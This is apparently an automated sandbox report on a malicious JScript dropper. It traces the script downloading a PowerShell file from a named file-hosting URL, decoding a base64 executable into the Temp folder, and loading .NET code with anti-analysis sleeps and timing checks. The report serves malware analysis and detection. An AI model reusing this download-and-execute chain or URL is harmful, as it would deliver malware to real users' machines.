Source:	Binary string: VCJSKS.pdb source: x.exe, 00000003.00000000.1775660603.0000000000AF2000.00000002.00000001.01000000.00000008.sdmp, x.exe.1.dr
Source:	Binary string: FREAKY.pdb(~>~ 0~_CorDllMainmscoree.dll source: x.exe, 00000003.00000002.1842412077.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1863261944.0000000005580000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: x.exe, 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: x.exe, x.exe, 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp

Data Obfuscation

JScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:19 o:Windows%20Script%20Host f:CreateObject r:");IHost.Name();ITextStream.WriteLine(" entry:26 o:Windows%20Script%20Host f:CreateObject a0:%22Scripting.FileSystemObject%22");IHost.CreateObject("Scripting.FileSystemObject");IHost.Name();IFileSystem3._00000000();ITextStream.WriteLine(" exit:26 o:Windows%20Script%20Host f:CreateObject r:");IHost.Name();ITextStream.WriteLine(" entry:33 o:Windows%20Script%20Host f:CreateObject a0:%22MSXML2.XMLHTTP%22");IHost.CreateObject("MSXML2.XMLHTTP");IHost.Name();IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:33 o:Windows%20Script%20Host f:CreateObject r:");IFileSystem3._00000000();ITextStream.WriteLine(" entry:42 o: f:FolderExists a0:%22C%3A%5CTemp%22");IFileSystem3.FolderExists("C:\Temp");IFileSystem3._00000000();ITextStream.WriteLine(" exit:42 o: f:FolderExists r:false");IFileSystem3._00000000();ITextStream.WriteLine(" entry:50 o: f:CreateFolder a0:%22C%3A%5CTemp%22");IFileSystem3.CreateFolder("C:\Temp");IFileSystem3._00000000();IFolder.Path();ITextStream.WriteLine(" exit:50 o: f:CreateFolder r:C%3A%5CTemp");ITextStream.WriteLine(" entry:181 f:DownloadScript a0:%22https%3A%2F%2Ffiles.catbox.moe%2Fugok5m.ps1%22 a1:%22C%3A%5CTemp%5Cdddddd.ps1%22");ITextStream.WriteLine(" exec:55 f:DownloadScript");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:62 o: f:Open a0:%22GET%22 a1:%22https%3A%2F%2Ffiles.catbox.moe%2Fugok5m.ps1%22 a2:false");IServerXMLHTTPRequest2.open("GET", "https://files.catbox.moe/ugok5m.ps1", "false");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:62 o: f:Open r:undefined");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:71 o: f:Send");IServerXMLHTTPRequest2.send();IHost.CreateObject("Scripting.FileSystemObject");IFileSystem3.CreateTextFile("Z:\syscalls\1484.js.csv");IHost.Name();ITextStream.WriteLine(" entry:19 o:Windows%20Script%20Host f:CreateObject a0:%22WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:19 o:Windows%20Script%20Host f:CreateObject r:");IHost.Name();ITextStream.WriteLine(" entry:26 o:Windows%20Script%20Host f:CreateObject a0:%22Scripting.FileSystemObject%22");IHost.CreateObject("Scripting.FileSystemObject");IHost.Name();IFileSystem3._00000000();ITextStream.WriteLine(" exit:26 o:Windows%20Script%20Host f:CreateObject r:");IHost.Name();ITextStream.WriteLine(" entry:33 o:Windows%20Script%20Host f:CreateObject a0:%22MSXML2.XMLHTTP%22");IHost.CreateObject("MSXML2.XMLHTTP");IHost.Name();IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:33 o:Windows%20Script%20Host f:CreateObject r:");IFileSystem3._00000000();ITextStream.WriteLine(" entry:42 o: f:FolderExists a0:%22C%3A%5CTemp%22");IFileSystem3.FolderExists("C:\Temp");IFileSystem3._00000000();ITextStream.WriteLine(" exit:42 o: f:FolderExists r:false");IFileSystem3._00000

.NET source code contains potential unpacker

Source: x.exe.1.dr, GnxjtY6uN0ibtr5Aob.cs

.Net Code: rLLLEvwNO System.Reflection.Assembly.Load(byte[])

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAA

Source: x.exe.1.dr

Static PE information: 0xD7852304 [Sun Jul 30 20:18:12 2084 UTC]

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_00415853 push esi; retf	4_2_0041585E
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_00403000 push eax; ret	4_2_00403002
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0042381B pushfd ; ret	4_2_00423826
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_00424028 push esi; ret	4_2_00424029
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0040A8DB push ds; iretd	4_2_0040A8E3
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_00418A67 push ebp; retf	4_2_00418A68
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_00417213 push esp; ret	4_2_00417262
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0041E23C push es; iretd	4_2_0041E23D
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_00423ACF push BB700124h; iretd	4_2_00423B42
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0040BAAC push cs; iretd	4_2_0040BAAD
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_004143C5 push ds; iretd	4_2_004143C7
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_00408463 push FFFFFF8Ch; iretd	4_2_0040847E
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_00423C14 push es; ret	4_2_00423C1A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0041E545 push FFFFFFCCh; retf	4_2_0041E547
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_00411D5E push eax; retf	4_2_00411D5F
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0041E6C8 push 2147A274h; iretd	4_2_0041E6CD
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_00415F53 push esp; retf	4_2_00415F5F
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0040C719 push esp; ret	4_2_0040C71E
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019809AD push ecx; mov dword ptr [esp], ecx	4_2_019809B6

Source: x.exe.1.dr, GnxjtY6uN0ibtr5Aob.cs

High entropy of concatenated method names: 'rLLLEvwNO', 'RwipenCOw', 'Nd9kNfCgU', 'dbJicOXfI', 'yACInIw9S', 'yMHV51IkZ', 'iGDvq9LvuibvO7CPBM', 'VY5Uqa1ZwOBeqhkQoD', 'onopDFZvpSjdctc7F9', 'nFuKoJnPcmPOFG9TuE'

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\x.exe

Jump to dropped file

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 1430000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 2DF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 4DF0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_019FD1C0 rdtsc

4_2_019FD1C0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 598469	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 598331	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2939	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2974	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Window / User API: threadDelayed 3299	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Window / User API: threadDelayed 1484	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe

API coverage: 0.7 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3104	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5324	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808	Thread sleep time: -13835058055282155s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7028	Thread sleep count: 3299 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7028	Thread sleep count: 1484 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808	Thread sleep time: -599656s >= -30000s	Jump to behavior
